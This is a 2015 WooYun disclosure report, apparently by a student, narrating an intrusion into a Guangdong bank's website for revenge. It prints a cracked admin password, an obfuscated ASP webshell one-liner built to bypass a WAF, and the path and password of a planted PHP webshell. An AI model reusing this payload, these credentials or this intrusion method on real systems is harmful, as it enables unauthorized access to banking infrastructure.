漏洞概要 关注数(52) 关注此漏洞
缺陷编号: WooYun-2015-103180
漏洞标题: 对广东省某商业银行的安全检测全过程
相关厂商: 对广东省某商业银行
漏洞作者: 猪猪侠表哥
提交时间: 2015-03-23 13:52
公开时间: 2015-05-08 17:34
漏洞类型: 成功的入侵事件
危害等级: 高
自评Rank: 20
漏洞状态: 已交由第三方合作机构(广东省信息安全测评中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org
Tags标签: 第三方不可信程序
漏洞详情
披露状态:
2015-03-23: 细节已通知厂商并且等待厂商处理中
2015-03-24: 厂商已经确认,细节仅向厂商公开
2015-04-03: 细节向核心白帽子及相关领域专家公开
2015-04-13: 细节向普通白帽子公开
2015-04-23: 细节向实习白帽子公开
2015-05-08: 细节向公众公开
简要描述:
先来个开场白吧,前几天无聊, 本来想看看市xx局的,后来想了下,还有几天就要开学了,然后就想到学校的一卡通,还有进校门就要刷卡,一卡通是学校跟高要农商银行合作的,还他妈的不支持支付宝转账,跨行转账就要五块钱的手续费,想想都觉得可怕,他妈的就是在这里坑钱的,对于本穷屌来说就更可怕了。我亦为何偏偏喜欢它呢?又想起以前的心酸往事了,本穷屌申请了国家的助学金,学校一定要去高要农商银行办卡才能给你发助学金,一定要去市中医院对面的那间高要农商银行办卡,后来我就和王某去了那间银行,结果我们到了并表示来意的时候,那间银行的经理叫我们到其他的支行去办,说他们要下班了,但是离他们下班的时间还有一个小时,但他就不肯让我们在这里班,怕拖延他下班的时间,我们就想,反正都是同一个银行,到其他支行办也应该行的,后来就找了几间支行,最后找到一间是没有下班的,办完之后,没想到第二天去交复印件的时候,辅导员就问我们去那间办的银行卡,我们说了之后,辅导员说,不行,一定要到指定的那间,要不学校是不会认的,我们只好中午再出去办,去到银行,有很多人,只能慢慢排队,结果就要上课了,还没有轮到我们,就只好请假咯,正好那天下午是我想上的ps课,后来就顺利交了复印件,可是我等那钱等到学期末,还没有发,正好我那时手头紧,一次次失望之后,说今学期不发,要到下个学期才发,原因嘛?就是学校要做那一卡通,合作的银行,还是高要农商银行。草泥马,又是这间银行,所以这次,嘻嘻!
详细说明:
目标:**.**.**.**
首先来爬行一下网站
发现了熟悉的plus目录
目测是梦织的程序
直接上EXP(用的是椰树)
帐号密码出来了
dmin(其实真实的帐号是admin) 6cbe0658e888860c8a04
这md5密文是20位的,怎么变成16位呢?
dedecms的密文都是去掉前三位和最后一位
e0658e888860c8a0
这样就可以了,拿去解密,发现要收费,本穷屌没钱,就拿了基友的帐号,花了一毛钱,把密文解出来了
解出来的结果是gy2013gy
现在最要是找后台了,各种工具扫描都没有结果
就利用搜索引擎来找吧,也没有结果
后来发现之前这间银行已经被别人爆过菊了
一年钱就有白帽子在乌云上提交过这间银行 的漏洞
看到这个毕竟有些失落和希望
他也是找不到后台,但是他是直接getshell的
所以用一下他用的EXP,看下是否有用
这个,没用
再直接getshell看看
也没有成功,显然之前的漏洞已经补上了。
想看下有没有旁站,结果也没有,这个站用的是独立服务器。
最后的一点希望也变成失望,那就只能乖乖找后台咯
过了几天之后,又有心情了,继续
/dede 没用
/admin 没用
/login 没用
/manage 没用
/gy 没用
/gyebank 没用
/ebank 没用
/bank 发现跳转到/bank/login.php
后台终于找到了
http://**.**.**.**/bank/login.php
ok 试下帐号密码
dmin gy2013
登陆时说帐号不存在
郁闷了,怎么会这样
想了想,还是试下这个吧
admin gy2013
人品啊,终于登陆成功了
终于拿下后台管理员权限了
经验告诉我
这种后台拿webshell权限有两种
1.在新增广告那里插入一句话木马
2.在模块那里插入木马,再更新下主页
但是,这次跟上面那里一样,都没有那么顺利
在广告那里插入一句话木马
这个还是过安全狗的一句话木马
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
保存成功,用过狗菜刀去链接,报错
尼玛,银行装的防护软件就是牛
尝试链接多几次,还是不行,显示超时
原来我被银行封ip了
之前在测试可用的EXP代码时也被封过几次
貌似只封一两小时
也当是中场休息吧
过了两个小时之后,发现能访问银行网站了,终于解封了
再进后台,发现之前插的一句话木马被删除了
银行就是屌啊
这次换下思路,在管理器那里插
但是用过狗菜刀连接时,又连接不上
最后又被封ip了
又过了两个小时解封后
这次我真的发怒了
直接在模块那里插php大马
更新下主页
成功
访问下大马的地址
http://**.**.**.**/gyadmin.php ; 密码为king
成功
ok webshell权限拿到了。搞这个站真是坎坷啊!
随便吐槽一下,学校居然跟这种安全做得这么渣的银行合作。
呵呵,一年前是被别人爆菊,现在是被我爆菊
漏洞证明:
修复方案:
我已经分不清我是在提交漏洞还是在写故事了
版权声明:转载请注明来源 猪猪侠表哥@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-03-24 17:33
厂商回复:
非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。
最新状态:
暂无
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值